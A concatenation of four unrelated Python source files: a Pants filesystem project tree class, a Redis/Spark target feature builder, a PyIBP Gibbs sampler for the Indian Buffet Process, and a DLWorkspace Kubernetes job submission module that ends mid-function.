from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import errno
import os
import stat
from glob import glob1
from pants.base.project_tree import PTSTAT_DIR, PTSTAT_FILE, PTSTAT_LINK, ProjectTree
from pants.util.dirutil import fast_relpath, safe_walk
class FileSystemProjectTree(ProjectTree):
def _join(self, relpath):
if relpath.startswith(os.sep):
raise ValueError('Absolute path "{}" not legal in {}.'.format(relpath, self))
return os.path.join(self.build_root, relpath)
def _glob1_raw(self, dir_relpath, glob):
return glob1(self._join(dir_relpath), glob)
def _listdir_raw(self, relpath):
# TODO: use scandir which is backported from 3.x
# https://github.com/pantsbuild/pants/issues/3250
return os.listdir(self._join(relpath))
def _isdir_raw(self, relpath):
return os.path.isdir(self._join(relpath))
def _isfile_raw(self, relpath):
return os.path.isfile(self._join(relpath))
def _exists_raw(self, relpath):
return os.path.exists(self._join(relpath))
def _content_raw(self, file_relpath):
with open(self._join(file_relpath), 'rb') as source:
return source.read()
def _relative_readlink_raw(self, relpath):
return os.readlink(self._join(relpath))
def _lstat_raw(self, relpath):
try:
mode = os.lstat(self._join(relpath)).st_mode
if stat.S_ISLNK(mode):
return PTSTAT_LINK
elif stat.S_ISDIR(mode):
return PTSTAT_DIR
elif stat.S_ISREG(mode):
return PTSTAT_FILE
else:
raise IOError('Unsupported file type in {}: {}'.format(self, relpath))
except (IOError, OSError) as e:
if e.errno == errno.ENOENT:
return None
else:
raise e
def _walk_raw(self, relpath, topdown=True):
def onerror(error):
raise OSError(getattr(error, 'errno', None), 'Failed to walk below {}'.format(relpath), error)
for root, dirs, files in safe_walk(self._join(relpath),
topdown=topdown,
onerror=onerror):
yield fast_relpath(root, self.build_root), dirs, files
def __eq__(self, other):
return other and (type(other) == type(self)) and (self.build_root == other.build_root)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.build_root)
def __repr__(self):
return '{}({})'.format(self.__class__.__name__, self.build_root)
|
from bicis.lib.utils import get_logger
logger = get_logger(__name__)
from bicis.etl.feature_extraction.next_window_target import NextWindowTarget
from bicis.lib.feature_builders.base_builders import FeatureBuilder
import redis
from pyspark.sql import SparkSession
redis_client = redis.StrictRedis()
class TargetFeatureBuilder(FeatureBuilder):
# TODO: check whether it makes sense to keep the `mode` parameter
def __init__(self, mode='rent', window='1h'):
"""
:param mode: whether to use the `rent` fields or the `return` fields on the raw_doc
"""
super(TargetFeatureBuilder, self).__init__()
self.window = window
self.mode = mode
def get_features(self, raw_doc):
res = redis_client.get(self._get_key_field(raw_doc.id))
return {'target': res}
def requirements(self):
return NextWindowTarget(mode=self.mode, window=self.window)
def ensure_structure(self):
done_key = 'TargetFeatureBuilder(mode={}, window={}).done'.format(self.mode, self.window)
if redis_client.get(done_key):
return
spark_sql = SparkSession.builder.getOrCreate()
input_fname = self.requirements().output().path
rows_iterator = (spark_sql
.read
.load(
input_fname,
format="csv",
sep=",",
inferSchema="true",
header="true")
).toLocalIterator()
for row in rows_iterator:
redis_client.set(
self._get_key_field(row.id),
row[self.requirements().output_field]
)
redis_client.set(done_key, 1)
def _get_key_field(self, id):
return '{}_id={}'.format(type(self), id)
|
"""
PyIBP
Implements fast Gibbs sampling for the linear-Gaussian
infinite latent feature model (IBP).
Copyright (C) 2009 David Andrzejewski (andrzeje@cs.wisc.edu)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
from scipy.stats import poisson, gamma
from scipy.special import gammaln, expit
from tqdm import tqdm_notebook
# We will be taking log(0) = -Inf, so turn off this warning
np.seterr(divide='ignore')
def lnfact(x):
return gammaln(x + 1)
class Feature:
def __init__(self, data, sigma_x, sigma_a):
self.X = data
self.XXT = self.X.T @ self.X
self.N, self.D = data.shape
sigma_x = sigma_x if isinstance(sigma_x, tuple) else (sigma_x, None, None)
sigma_a = sigma_a if isinstance(sigma_a, tuple) else (sigma_a, None, None)
_, self.sigma_xa, self.sigma_xb = sigma_x
_, self.sigma_aa, self.sigma_ab = sigma_a
self.var_x = sigma_x[0] ** 2
self.var_a = sigma_a[0] ** 2
self.meanA, self.covarA, self.hA, self.infoA = (None,) * 4
def logPxi(self, zi, i, noise=0):
# Mean/covar of xi given posterior over A
meanLike = np.dot(zi, self.meanA)
covarLike = np.dot(zi, np.dot(self.covarA, zi.T)) + self.var_x
# Calculate log-likelihood of a single xi
covarLike += noise
ll = self.D * np.log(covarLike) + np.power(self.X[i] - meanLike, 2).sum() / covarLike
return -ll / 2
def calcM(self, Z):
""" Calculate M = (Z' * Z - (sigmax^2) / (sigmaa^2) * I)^-1 """
K = Z.shape[1]
return np.linalg.inv(np.dot(Z.T, Z) + self.var_x / self.var_a * np.eye(K))
def logPX(self, Z):
""" Calculate collapsed log likelihood of data"""
M = self.calcM(Z)
K = Z.shape[1]
lp = -self.N * self.D * np.log(2 * np.pi * self.var_x)
lp -= K * self.D * np.log(self.var_a / self.var_x)
lp += self.D * np.log(np.linalg.det(M))
XZ = self.X.T @ Z
lp -= np.trace(self.XXT - XZ @ M @ XZ.T) / self.var_x
return lp / 2
def sampleSigma(self, Z):
""" Sample feature/noise variances """
K = Z.shape[1]
# Posterior over feature weights A
meanA, covarA = self.postA(Z)
# var_x
vars = np.dot(Z, np.dot(covarA, Z.T)).diagonal()
var_x = (np.power(self.X - np.dot(Z, meanA), 2)).sum()
var_x += self.D * vars.sum()
n = float(self.N * self.D)
postShape = self.sigma_xa + n / 2
postScale = 1 / (self.sigma_xb + var_x / 2)
tau_x = gamma.rvs(postShape, scale=postScale)
self.var_x = 1 / tau_x
# var_a
var_a = covarA.trace() * self.D + np.power(meanA, 2).sum()
n = float(K * self.D)
postShape = self.sigma_aa + n / 2
postScale = 1 / (self.sigma_ab + var_a / 2)
tau_a = gamma.rvs(postShape, scale=postScale)
self.var_a = 1 / tau_a
def postA(self, Z):
""" Mean/covar of posterior over weights A """
M = self.calcM(Z)
meanA = np.dot(M, np.dot(Z.T, self.X))
covarA = self.var_x * self.calcM(Z)
return meanA, covarA
def weights(self, Z):
""" Return E[A|X,Z] """
return self.postA(Z)[0]
def update(self, zi, xi, sub=False):
""" Add/remove data i to/from information """
xi, zi = xi.reshape(1, -1), zi.reshape(1, -1)
sub = 1 if sub else -1
self.infoA += sub * ((1 / self.var_x) * np.dot(zi.T, zi))
self.hA += sub * ((1 / self.var_x) * np.dot(zi.T, xi))
class PyIBP(object):
def __init__(self, data, alpha, sigma_xs, sigma_as):
"""
data = NxD NumPy data matrix (should be centered)
alpha = Fixed IBP hyperparam for OR (init,a,b) tuple where
(a,b) are Gamma hyperprior shape and rate/inverse scale
"""
self.N = data[0].shape[0]
self.feats = [Feature(d, sigma_x, sigma_a) for d, sigma_x, sigma_a in zip(data, sigma_xs, sigma_as)]
# IBP hyperparameter
if (type(alpha) == tuple):
(self.alpha, self.alpha_a, self.alpha_b) = alpha
else:
(self.alpha, self.alpha_a, self.alpha_b) = (alpha, None, None)
self.initZ()
self.Zs = []
def initZ(self):
""" Init latent features Z according to IBP(alpha) """
Z = np.ones((0, 0))
for i in range(1, self.N + 1):
# Sample existing features
zi = (np.random.uniform(0, 1, (1, Z.shape[1])) <
(Z.sum(axis=0).astype(np.float) / i))
# Sample new features
knew = poisson.rvs(self.alpha / i)
zi = np.hstack((zi, np.ones((1, knew))))
# Add to Z matrix
Z = np.hstack((Z, np.zeros((Z.shape[0], knew))))
Z = np.vstack((Z, zi))
self.Z = Z
self.K = self.Z.shape[1]
# Calculate initial feature counts
self.m = self.Z.sum(axis=0)
#
# Convenient external methods
#
def fullSample(self):
""" Do all applicable samples """
self.sampleZ()
if self.alpha_a is not None:
self.sampleAlpha()
for feat in self.feats:
if feat.sigma_xa is not None:
feat.sampleSigma(self.Z)
def logLike(self, flag=False):
return self.logIBP() + sum(f.logPX(self.Z) for f in self.feats)
def sampleAlpha(self):
""" Sample alpha from conjugate posterior """
postShape = self.alpha_a + self.m.sum()
postScale = 1 / (self.alpha_b + self.N)
self.alpha = gamma.rvs(postShape, scale=postScale)
def sampleZ(self):
""" Take single sample of latent features Z """
# for each data point
order = np.random.permutation(self.N)
for (ctr, i) in enumerate(order):
# Initially, and later occasionally,
# re-cacluate information directly
if ctr % 5 == 0:
for feat in self.feats:
feat.meanA, feat.covarA = feat.postA(self.Z)
feat.infoA = np.linalg.inv(feat.covarA)
feat.hA = feat.infoA @ feat.meanA
# Get (z,x) for this data point
zi = self.Z[i]
# Remove this point from information
for feat in self.feats:
feat.update(self.Z[i], feat.X[i], sub=True)
feat.covarA = np.linalg.inv(feat.infoA)
feat.meanA = np.dot(feat.covarA, feat.hA)
# Remove this data point from feature cts
mi = self.m - self.Z[i]
lpz = np.log(np.stack((self.N - mi, mi)))
# Find all singleton features
singletons = np.nonzero(mi <= 0)[0]
# Sample for each non-singleton feature
#
prev = np.copy(zi)
for k in np.nonzero(mi > 0)[0]:
zi[k] = 0
lp0 = lpz[0, k] + sum(f.logPxi(zi, i) for f in self.feats)
zi[k] = 1
lp1 = lpz[1, k] + sum(f.logPxi(zi, i) for f in self.feats)
zi[k] = int(np.random.uniform(0, 1) < expit(lp1 - lp0))
self.m += zi - prev
# Metropolis-Hastings step described in Meeds et al
netk = poisson.rvs(self.alpha / self.N) - len(singletons)
# Calculate the loglikelihoods
lpold = sum(f.logPxi(zi, i) for f in self.feats)
lpnew = sum(f.logPxi(zi, i, noise=netk * f.var_a) for f in self.feats)
lpaccept = min(0.0, lpnew - lpold)
lpreject = np.log(max(1.0 - np.exp(lpaccept), 1e-100))
if np.random.uniform(0, 1) < expit(lpaccept - lpreject):
if netk > 0:
self.Z = np.hstack((self.Z, np.zeros((self.N, netk))))
self.Z[i, self.K:] = 1
self.m = np.hstack((self.m, np.ones(netk)))
for feat in self.feats:
zero = np.zeros((self.K, netk))
feat.infoA = np.block([[feat.infoA, zero], [zero.T, np.eye(netk) / feat.var_a]])
feat.hA = np.vstack((feat.hA, np.zeros((netk, feat.D))))
elif netk < 0:
dead = singletons[:-netk]
self.Z = np.delete(self.Z, dead, axis=1)
self.m = np.delete(self.m, dead)
for feat in self.feats:
feat.infoA = np.delete(feat.infoA, dead, axis=0)
feat.infoA = np.delete(feat.infoA, dead, axis=1)
feat.hA = np.delete(feat.hA, dead, axis=0)
self.K += netk
for feat in self.feats:
feat.update(self.Z[i], feat.X[i])
def logIBP(self):
logp = self.K * np.log(self.alpha)
logp -= lnfact(np.unique(self.Z, axis=1, return_counts=True)[1]).sum()
logp -= (self.alpha / np.arange(1, self.N + 1)).sum()
facts = lnfact(self.N - self.m) + self.lnfact(self.m - 1) - self.lnfact(self.N)
return logp + facts.sum()
def predict(self, Xs):
best = (0, None, None)
for Z in self.Zs:
m = Z.sum(axis=0) - Z
lps = np.sum(np.log(np.where(Z == 1, m, self.N - m) / self.N), axis=1)
for f, X in zip(self.feats[:-1], Xs[:-1]):
X_bar = Z @ f.weights(Z)
diffs = np.sum((X - X_bar) ** 2, axis=1) / (2 * f.var_x)
lps -= diffs + np.log(2 * np.pi) / 2 + np.log(f.var_x) * f.D / 2
i = np.argmax(lps)
if lps[i] > best[0]:
best = lps[i], Z, i
best_lp, best_Z, best_i = best
return self.feats[-1].weights(best_Z) @ best_Z[best_i]
def run_sampler(self, iters=5000, burn_in=3000, thin=10):
self.Zs = []
for i in tqdm_notebook(range(iters)):
self.fullSample()
print(self.K)
if i > burn_in and i % thin == 0:
self.Zs.append(np.copy(self.Z))
return self.Zs
|
import json
import os
import time
import argparse
import uuid
import subprocess
import sys
import datetime
import copy
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../storage"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../utils"))
from jobs_tensorboard import GenTensorboardMeta
import k8sUtils
import joblog_manager
from osUtils import mkdirsAsUser
import yaml
from jinja2 import Environment, FileSystemLoader, Template
from config import config, GetStoragePath, GetWorkPath
from DataHandler import DataHandler
from node_manager import create_log
from node_manager import get_cluster_status
import base64
import re
import thread
import threading
import random
import logging
import logging.config
nvidiaDriverPath = config["nvidiaDriverPath"]
def printlog(msg):
print "%s - %s" % (datetime.datetime.utcnow().strftime("%x %X"),msg)
def LoadJobParams(jobParamsJsonStr):
return json.loads(jobParamsJsonStr)
def cmd_exec(cmdStr):
try:
output = subprocess.check_output(["bash","-c", cmdStr])
except Exception as e:
print e
output = ""
return output
def SubmitJob(job):
jobParams = json.loads(base64.b64decode(job["jobParams"]))
if jobParams["jobtrainingtype"] == "RegularJob":
SubmitRegularJob(job)
elif jobParams["jobtrainingtype"] == "PSDistJob":
SubmitPSDistJob(job)
def CheckMountPoints(mplist, mp):
ret = True
for item in mplist:
if item["name"] == mp["name"] or item["containerPath"] == mp["containerPath"] or item["hostPath"] == mp["hostPath"]:
ret = False
return ret
def SubmitRegularJob(job):
ret = {}
dataHandler = DataHandler()
try:
jobParams = json.loads(base64.b64decode(job["jobParams"]))
jobParams["pvc_job"] = "jobs-" + jobParams["jobId"]
jobParams["pvc_work"] = "work-" + jobParams["jobId"]
jobParams["pvc_data"] = "storage-" + jobParams["jobId"]
if "jobPath" not in jobParams or len(jobParams["jobPath"].strip()) == 0:
dataHandler.SetJobError(jobParams["jobId"],"ERROR: job-path does not exist")
return False
if "workPath" not in jobParams or len(jobParams["workPath"].strip()) == 0:
dataHandler.SetJobError(jobParams["jobId"],"ERROR: work-path does not exist")
return False
#if "dataPath" not in jobParams or len(jobParams["dataPath"].strip()) == 0:
# dataHandler.SetJobError(jobParams["jobId"],"ERROR: data-path does not exist")
# return False
jobPath,workPath,dataPath = GetStoragePath(jobParams["jobPath"],jobParams["workPath"],jobParams["dataPath"])
localJobPath = os.path.join(config["storage-mount-path"],jobPath)
if not os.path.exists(localJobPath):
if "userId" in jobParams:
mkdirsAsUser(localJobPath,jobParams["userId"])
mkdirsAsUser(os.path.join(localJobPath,"models"),jobParams["userId"])
else:
mkdirsAsUser(localJobPath,"0")
mkdirsAsUser(os.path.join(localJobPath,"models"),"0")
jobParams["LaunchCMD"] = ""
if "cmd" not in jobParams:
jobParams["cmd"] = ""
if isinstance(jobParams["cmd"], basestring) and not jobParams["cmd"] == "":
launchScriptPath = os.path.join(localJobPath,"launch-%s.sh" % jobParams["jobId"])
with open(launchScriptPath, 'w') as f:
f.write("#!/bin/bash -x\n")
f.write(jobParams["cmd"] + "\n")
f.close()
if "userId" in jobParams:
os.system("chown -R %s %s" % (jobParams["userId"], launchScriptPath))
jobParams["LaunchCMD"] = "[\"bash\", \"/job/launch-%s.sh\"]" % jobParams["jobId"]
jobParams["jobDescriptionPath"] = "jobfiles/" + time.strftime("%y%m%d") + "/" + jobParams["jobId"] + "/" + jobParams["jobId"] + ".yaml"
jobParams["jobNameLabel"] = ''.join(e for e in jobParams["jobName"] if e.isalnum())
ENV = Environment(loader=FileSystemLoader("/"))
jobTempDir = os.path.join(config["root-path"],"Jobs_Templete")
jobTemp = os.path.join(jobTempDir, "RegularJob.yaml.template")
jobParams["hostjobPath"] = os.path.join(config["storage-mount-path"], jobPath)
jobParams["hostworkPath"] = os.path.join(config["storage-mount-path"], workPath)
jobParams["hostdataPath"] = os.path.join(config["storage-mount-path"], dataPath)
jobParams["nvidiaDriverPath"] = nvidiaDriverPath
jobParams["userNameLabel"] = getAlias(jobParams["userName"])
jobParams["rest-api"] = config["rest-api"]
if "mountpoints" not in jobParams:
jobParams["mountpoints"] = []
for onemount in jobParams["mountpoints"]:
onemount["name"] = onemount["containerPath"].replace("/","")
mp = {"name":"nvidia-driver","containerPath":"/usr/local/nvidia","hostPath":nvidiaDriverPath, "enabled":True}
if CheckMountPoints(jobParams["mountpoints"],mp):
jobParams["mountpoints"].append(mp)
mp = {"name":"job","containerPath":"/job","hostPath":jobParams["hostjobPath"], "enabled":True}
if CheckMountPoints(jobParams["mountpoints"],mp):
jobParams["mountpoints"].append(mp)
mp = {"name":"work","containerPath":"/work","hostPath":jobParams["hostworkPath"], "enabled":True}
if CheckMountPoints(jobParams["mountpoints"],mp):
jobParams["mountpoints"].append(mp)
mp = {"name":"data","containerPath":"/data","hostPath":jobParams["hostdataPath"], "enabled":True}
if CheckMountPoints(jobParams["mountpoints"],mp):
jobParams["mountpoints"].append(mp)
userAlias = getAlias(jobParams["userName"])
mp = {"name":"sshkey","containerPath":"/home/%s/.ssh" % userAlias,"hostPath":os.path.join(config["storage-mount-path"], GetWorkPath(userAlias)+"/.ssh"), "readOnly":True, "enabled":True}
if CheckMountPoints(jobParams["mountpoints"],mp):
jobParams["mountpoints"].append(mp)
jobParams["pod_ip_range"] = config["pod_ip_range"]
if "usefreeflow" in config:
jobParams["usefreeflow"] = config["usefreeflow"]
else:
jobParams["usefreeflow"] = False
print ("Render Job: %s" % jobParams)
jobDescriptionList = []
pods = []
if "hyperparametername" in jobParams and "hyperparameterstartvalue" in jobParams and "hyperparameterendvalue" in jobParams and "hyperparameterstep" in jobParams:
i = int(jobParams["hyperparameterstartvalue"])
end = int(jobParams["hyperparameterendvalue"])
step = int(jobParams["hyperparameterstep"])
c = 0
while (i <= end):
pod = {}
pod["podName"] = jobParams["jobId"]+"-pod-"+str(c)
pod["envs"] = [{"name":jobParams["hyperparametername"],"value":i}]
i += step
c += 1
pods.append(pod)
else:
pod = {}
pod["podName"] = jobParams["jobId"]
pod["envs"] = []
pods.append(pod)
if "env" not in jobParams:
jobParams["env"] = []
jobParams["commonenv"] = copy.copy(jobParams["env"])
for pod in pods:
jobParams["podName"] = pod["podName"]
jobParams["env"] = jobParams["commonenv"] + pod["envs"]
if "kube_custom_scheduler" in config and config["kube_custom_scheduler"]:
container = {}
container["requests"] = {"alpha.gpu/numgpu" : jobParams["resourcegpu"]}
podInfo = {}
podInfo["podname"] = jobParams["podName"]
if "useGPUTopology" in jobParams and jobParams["useGPUTopology"]:
# add topology constraints explicitly - for testing
# if (jobParams["resourcegpu"] >= 2):
# # both cards in same inner group
# container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/0/gpu/0/cards"] = 1
# container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/0/gpu/1/cards"] = 1
# if (jobParams["resourcegpu"] >= 3):
# container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/1/gpu/2/cards"] = 1
# if (jobParams["resourcegpu"] >= 4):
# container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/1/gpu/3/cards"] = 1
# if (jobParams["resourcegpu"] >= 5):
# container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/2/gpu/4/cards"] = 1
# if (jobParams["resourcegpu"] >= 6):
# container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/2/gpu/5/cards"] = 1
# if (jobParams["resourcegpu"] >= 7):
# container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/3/gpu/6/cards"] = 1
# if (jobParams["resourcegpu"] >= 8):
# container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/3/gpu/7/cards"] = 1
podInfo["requests"] = {"alpha.gpu/gpu-generate-topology" : 1}
else:
# for cases when desired topology is explictly given or not desired
podInfo["requests"] = {"alpha.gpu/gpu-generate-topology" : 0}
podInfo["runningcontainer"] = {jobParams["podName"] : container}
if "annotations" not in jobParams:
jobParams["annotations"] = {}
jobParams["annotations"]["pod.alpha/DeviceInformation"] = "'" + json.dumps(podInfo) + "'"
jobParams["resourcegpu"] = 0 # gpu requests specified through annotation
template = ENV.get_template(os.path.abspath(jobTemp))
job_description = template.render(job=jobParams)
jobDescriptionList.append(job_description)
if ("interactivePort" in jobParams and len(jobParams["interactivePort"].strip()) > 0):
ports = [p.strip() for p in re.split(",|;",jobParams["interactivePort"]) if len(p.strip()) > 0 and p.strip().isdigit()]
for portNum in ports:
jobParams["serviceId"] = "interactive-" + jobParams["podName"] + "-" + portNum
jobParams["port"] = portNum
jobParams["port-name"] = "interactive"
jobParams["port-type"] = "TCP"
serviceTemplate = ENV.get_template(os.path.join(jobTempDir,"KubeSvc.yaml.template"))
stemplate = ENV.get_template(serviceTemplate)
interactiveMeta = stemplate.render(svc=jobParams)
jobDescriptionList.append(interactiveMeta)
jobDescription = "\n---\n".join(jobDescriptionList)
jobDescriptionPath = os.path.join(config["storage-mount-path"], jobParams["jobDescriptionPath"])
if not os.path.exists(os.path.dirname(os.path.realpath(jobDescriptionPath))):
os.makedirs(os.path.dirname(os.path.realpath(jobDescriptionPath)))
if os.path.isfile(jobDescriptionPath):
output = k8sUtils.kubectl_delete(jobDescriptionPath)
with open(jobDescriptionPath, 'w') as f:
f.write(jobDescription)
output = k8sUtils.kubectl_create(jobDescriptionPath)
logging.info("Submitted job %s to k8s, returned with status %s" %(job["jobId"], output))
ret["output"] = output
ret["jobId"] = jobParams["jobId"]
if "userName" not in jobParams:
jobParams["userName"] = ""
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","scheduling")
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescriptionPath",jobParams["jobDescriptionPath"])
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescription",base64.b64encode(jobDescription))
jobMeta = {}
jobMeta["jobDescriptionPath"] = jobParams["jobDescriptionPath"]
jobMeta["jobPath"] = jobParams["jobPath"]
jobMeta["workPath"] = jobParams["workPath"]
jobMeta["jobPath"] = jobParams["jobPath"]
jobMeta["LaunchCMD"] = jobParams["LaunchCMD"]
jobMetaStr = base64.b64encode(json.dumps(jobMeta))
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobMeta",jobMetaStr)
except Exception as e:
print e
ret["error"] = str(e)
retries = dataHandler.AddandGetJobRetries(jobParams["jobId"])
if retries >= 5:
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","error")
dataHandler.UpdateJobTextField(jobParams["jobId"],"errorMsg","Cannot submit job!" + str(e))
return ret
def SubmitPSDistJob(job):
ret = {}
dataHandler = DataHandler()
try:
jobParams = json.loads(base64.b64decode(job["jobParams"]))
jobParams["rest-api"] = config["rest-api"]
distJobParams = {}
distJobParams["ps"] = []
distJobParams["worker"] = []
assignedRack = None
if len(config["racks"]) > 0:
assignedRack = random.choice(config["racks"])
if jobParams["jobtrainingtype"] == "PSDistJob":
jobDescriptionList = []
nums = {"ps":int(jobParams["numps"]),"worker":int(jobParams["numpsworker"])}
for role in ["ps","worker"]:
for i in range(nums[role]):
distJobParam=copy.deepcopy(jobParams)
distJobParam["distId"] = "%s%d" % (role,i)
distJobParam["distRole"] = role
if "jobPath" not in distJobParam or len(distJobParam["jobPath"].strip()) == 0:
dataHandler.SetJobError(distJobParam["jobId"],"ERROR: job-path does not exist")
return False
distJobParam["distJobPath"] = os.path.join(distJobParam["jobPath"],distJobParam["distId"])
if "workPath" not in distJobParam or len(distJobParam["workPath"].strip()) == 0:
dataHandler.SetJobError(distJobParam["jobId"],"ERROR: work-path does not exist")
return False
if "dataPath" not in distJobParam or len(distJobParam["dataPath"].strip()) == 0:
dataHandler.SetJobError(distJobParam["jobId"],"ERROR: data-path does not exist")
return False
jobPath,workPath,dataPath = GetStoragePath(distJobParam["distJobPath"],distJobParam["workPath"],distJobParam["dataPath"])
localJobPath = os.path.join(config["storage-mount-path"],jobPath)
if not os.path.exists(localJobPath):
if "userId" in distJobParam:
mkdirsAsUser(localJobPath,distJobParam["userId"])
else:
mkdirsAsUser(localJobPath,0)
distJobParam["LaunchCMD"] = ""
if "cmd" not in distJobParam:
distJobParam["cmd"] = ""
################One choice is that we only wait for certain time.
# launchCMD = """
##!/bin/bash
#mkdir -p /opt
#echo "[DLWorkspace System]: Waiting for all containers are ready..."
## wait for at most 10 mins.
#for i in {1..200}; do
# if [ ! -f /opt/run_dist_job ] || [ ! -f /opt/run_dist_job.sh ]; then
# sleep 3
# else
# break
# fi
#done
#if [ ! -f /opt/run_dist_job ] || [ ! -f /opt/run_dist_job.sh ]; then
# echo "[DLWorkspace System]: Waiting for containers: timeout! Restarting..."
# exit 1
#else
# echo "[DLWorkspace System]: All containers are ready, launching training job..."
# chmod +x /opt/run_dist_job.sh
# /opt/run_dist_job.sh
#fi
#"""
launchCMD = """
#!/bin/bash
mkdir -p /opt
echo "[DLWorkspace System]: Waiting for all containers are ready..."
while [ ! -f /opt/run_dist_job ] || [ ! -f /opt/run_dist_job.sh ]; do
sleep 3
done
echo "[DLWorkspace System]: All containers are ready, launching training job..."
chmod +x /opt/run_dist_job.sh
/opt/run_dist_job.sh
"""
launchScriptPath = os.path.join(localJobPath,"launch-%s.sh" % distJobParam["jobId"])
with open(launchScriptPath, 'w') as f:
f.write(launchCMD)
f.close()
distJobParam["LaunchCMD"] = "[\"bash\", \"/job/launch-%s.sh\"]" % distJobParam["jobId"]
distJobParam["jobNameLabel"] = ''.join(e for e in distJobParam["jobName"] if e.isalnum())
distJobParam["userNameLabel"] = getAlias(jobParams["userName"])
ENV = Environment(loader=FileSystemLoader("/"))
jobTempDir = os.path.join(config["root-path"],"Jobs_Templete")
jobTemp = os.path.join(jobTempDir, "DistJob.yaml.template")
distJobParam["hostjobPath"] = os.path.join(config["storage-mount-path"], jobPath)
distJobParam["hostworkPath"] = os.path.join(config["storage-mount-path"], workPath)
distJobParam["hostdataPath"] = os.path.join(config["storage-mount-path"], dataPath)
distJobParam["nvidiaDriverPath"] = nvidiaDriverPath
if "mountpoints" not in distJobParam:
distJobParam["mountpoints"] = []
distJobParam["mountpoints"].append({"name":"nvidia-driver","containerPath":"/usr/local/nvidia","hostPath":nvidiaDriverPath})
distJobParam["mountpoints"].append({"name":"job","containerPath":"/job","hostPath":distJobParam["hostjobPath"]})
distJobParam["mountpoints"].append({"name":"work","containerPath":"/work","hostPath":distJobParam["hostworkPath"]})
distJobParam["mountpoints"].append({"name":"data","containerPath":"/data","hostPath":distJobParam["hostdataPath"]})
distJobParam["pod_ip_range"] = config["pod_ip_range"]
if "usefreeflow" in config and config["usefreeflow"] == "True":
distJobParam["usefreeflow"] = config["usefreeflow"]
else:
distJobParam["usefreeflow"] = False
random.seed(datetime.datetime.now())
distJobParam["containerPort"] = int(random.random()*1000+3000)
if assignedRack is not None:
if "nodeSelector" not in distJobParam:
distJobParam["nodeSelector"] = {}
distJobParam["nodeSelector"]["rack"] = assignedRack
template = ENV.get_template(os.path.abspath(jobTemp))
job_description = template.render(job=distJobParam)
jobDescriptionList.append(job_description)
distJobParams[role].append(distJobParam)
jobParams["jobDescriptionPath"] = "jobfiles/" + time.strftime("%y%m%d") + "/" + jobParams["jobId"] + "/" + jobParams["jobId"] + ".yaml"
jobDescription = "\n---\n".join(jobDescriptionList)
jobDescriptionPath = os.path.join(config["storage-mount-path"], jobParams["jobDescriptionPath"])
if not os.path.exists(os.path.dirname(os.path.realpath(jobDescriptionPath))):
os.makedirs(os.path.dirname(os.path.realpath(jobDescriptionPath)))
if os.path.isfile(jobDescriptionPath):
output = k8sUtils.kubectl_delete(jobDescriptionPath)
with open(jobDescriptionPath, 'w') as f:
f.write(jobDescription)
output = k8sUtils.kubectl_create(jobDescriptionPath)
ret["output"] = output
ret["jobId"] = jobParams["jobId"]
if "userName" not in jobParams:
jobParams["userName"] = ""
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","scheduling")
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescriptionPath",jobParams["jobDescriptionPath"])
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescription",base64.b64encode(jobDescription))
jobMeta = {}
jobMeta["jobDescriptionPath"] = jobParams["jobDescriptionPath"]
jobMeta["jobPath"] = jobParams["jobPath"]
jobMeta["workPath"] = jobParams["workPath"]
jobMeta["jobPath"] = jobParams["jobPath"]
jobMeta["LaunchCMD"] = jobParams["LaunchCMD"]
jobMeta["distJobParams"] = distJobParams
jobMetaStr = base64.b64encode(json.dumps(jobMeta))
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobMeta",jobMetaStr)
except Exception as e:
print e
ret["error"] = str(e)
retries = dataHandler.AddandGetJobRetries(jobParams["jobId"])
if retries >= 5:
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","error")
dataHandler.UpdateJobTextField(jobParams["jobId"],"errorMsg","Cannot submit job!" + str(e))
return ret
def KillJob(job):
dataHandler = DataHandler()
result, detail = k8sUtils.GetJobStatus(job["jobId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(json.dumps(detail)))
logging.info("Killing job %s, with status %s, %s" %(job["jobId"], result,detail))
if "jobDescriptionPath" in job and job["jobDescriptionPath"] is not None:
jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"])
if os.path.isfile(jobDescriptionPath):
if k8sUtils.kubectl_delete(jobDescriptionPath) == 0:
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","killed")
return True
else:
dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","Cannot delete job from Kubernetes Cluster!")
else:
dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","Cannot find job description file!")
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","error")
return False
def getAlias(username):
if "@" in username:
username = username.split("@")[0].strip()
if "/" in username:
username = username.split("/")[1].strip()
return username
def ApproveJob(job):
dataHandler = DataHandler()
dataHandler.ApproveJob(job["jobId"])
dataHandler.Close()
return True
def AutoApproveJob(job):
cluster_status = get_cluster_status()
jobUser = getAlias(job["userName"])
jobParams = json.loads(base64.b64decode(job["jobParams"]))
